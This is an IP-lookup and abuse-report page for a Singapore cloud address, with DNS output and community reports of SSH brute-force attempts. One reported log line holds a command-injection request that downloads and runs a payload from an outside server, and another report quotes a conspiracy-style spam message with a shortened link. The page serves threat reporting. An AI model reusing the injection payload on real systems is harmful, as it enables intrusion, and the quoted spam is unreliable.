159.138.95.199

Basic Info

City: unknown

Region: unknown

Country: Singapore

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 159.138.95.199
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 49285
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;159.138.95.199.			IN	A

;; AUTHORITY SECTION:
.			600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022072202 1800 900 604800 86400

;; Query time: 69 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Jul 23 05:26:20 CST 2022
;; MSG SIZE  rcvd: 107

Host info

199.95.138.159.in-addr.arpa domain name pointer ecs-159-138-95-199.compute.hwclouds-dns.com.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
199.95.138.159.in-addr.arpa	name = ecs-159-138-95-199.compute.hwclouds-dns.com.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
190.187.108.252	attackbots	Sep 1 13:26:32 shivevps sshd[27284]: Did not receive identification string from 190.187.108.252 port 37952 ...	2020-09-02 04:40:25
101.71.28.72	attack	Sep 1 03:28:58 web9 sshd\[4148\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=101.71.28.72 user=root Sep 1 03:29:01 web9 sshd\[4148\]: Failed password for root from 101.71.28.72 port 35880 ssh2 Sep 1 03:35:13 web9 sshd\[4925\]: Invalid user rust from 101.71.28.72 Sep 1 03:35:13 web9 sshd\[4925\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=101.71.28.72 Sep 1 03:35:15 web9 sshd\[4925\]: Failed password for invalid user rust from 101.71.28.72 port 37458 ssh2	2020-09-02 04:29:08
188.187.52.107	attackbots	1598963201 - 09/01/2020 14:26:41 Host: 188.187.52.107/188.187.52.107 Port: 445 TCP Blocked	2020-09-02 04:32:24
73.217.210.236	spambotsattackproxynormal	My comcast router is hacked by a PROXY server	2020-09-02 04:59:22
123.101.207.142	attack	Sep 1 13:26:24 shivevps sshd[27268]: Bad protocol version identification '\024' from 123.101.207.142 port 52296 ...	2020-09-02 04:46:26
221.143.48.143	attack	Sep 1 19:40:45 rotator sshd\[16792\]: Address 221.143.48.143 maps to mailfwd.mailplug.co.kr, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!Sep 1 19:40:48 rotator sshd\[16792\]: Failed password for root from 221.143.48.143 port 33726 ssh2Sep 1 19:44:19 rotator sshd\[16809\]: Address 221.143.48.143 maps to mailfwd.mailplug.co.kr, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!Sep 1 19:44:19 rotator sshd\[16809\]: Invalid user made from 221.143.48.143Sep 1 19:44:21 rotator sshd\[16809\]: Failed password for invalid user made from 221.143.48.143 port 41260 ssh2Sep 1 19:47:58 rotator sshd\[17571\]: Address 221.143.48.143 maps to mailfwd.mailplug.co.kr, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!Sep 1 19:47:58 rotator sshd\[17571\]: Invalid user hadoop from 221.143.48.143 ...	2020-09-02 04:41:41
119.18.157.154	attack	Sep 1 13:26:39 shivevps sshd[27485]: Bad protocol version identification '\024' from 119.18.157.154 port 53440 ...	2020-09-02 04:36:38
163.172.157.193	attack	Automatic report - Banned IP Access	2020-09-02 04:36:08
84.17.60.216	attackspam	(From wehrle.robby@gmail.com) Hello, I have been informed to contact you. The CIA has been doing intensive research for the past fifty years researching on what we call so called life. That information has been collected and presented for you here https://bit.ly/3lqUJ3u This has been the finding as of seventeen years ago as of today. Now governments and other large organizations have develop technology around these concepts for their own deceptive uses. Soon you will be contacted by other means for counter measures and the part that you play in all this. Please get this as soon as possible because there are powers that be to take down this information about this.	2020-09-02 04:54:53
173.201.196.61	attackspambots	xmlrpc attack	2020-09-02 04:57:47
222.175.100.120	attackspam	Icarus honeypot on github	2020-09-02 04:36:56
202.57.40.227	attack	GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://5.206.227.228/zero;sh zero;" HTTP/1.0	2020-09-02 04:51:28
194.26.25.102	attackspambots	ET DROP Dshield Block Listed Source group 1 - port: 7010 proto: tcp cat: Misc Attackbytes: 60	2020-09-02 04:38:54
58.22.177.146	attackspam	Sep 1 13:26:25 shivevps sshd[27292]: Bad protocol version identification '\024' from 58.22.177.146 port 57830 ...	2020-09-02 04:46:50
210.77.68.221	attackspam	2020-09-01T15:15:22.993935shield sshd\[20197\]: Invalid user test from 210.77.68.221 port 63866 2020-09-01T15:15:23.003258shield sshd\[20197\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=210.77.68.221 2020-09-01T15:15:24.793883shield sshd\[20197\]: Failed password for invalid user test from 210.77.68.221 port 63866 ssh2 2020-09-01T15:19:22.258814shield sshd\[20801\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=210.77.68.221 user=root 2020-09-01T15:19:24.191162shield sshd\[20801\]: Failed password for root from 210.77.68.221 port 63979 ssh2	2020-09-02 04:52:52

Recently Reported IPs

159.139.202.233	159.142.235.135	159.139.126.166	159.142.129.189
159.142.91.63	159.14.109.93	159.142.136.124	159.14.208.16
159.139.0.20	159.140.100.24	159.14.6.203	159.138.91.243
159.138.89.88	159.143.156.5	159.141.55.209	159.142.13.39
159.142.34.227	159.143.146.29	159.139.210.162	159.139.13.22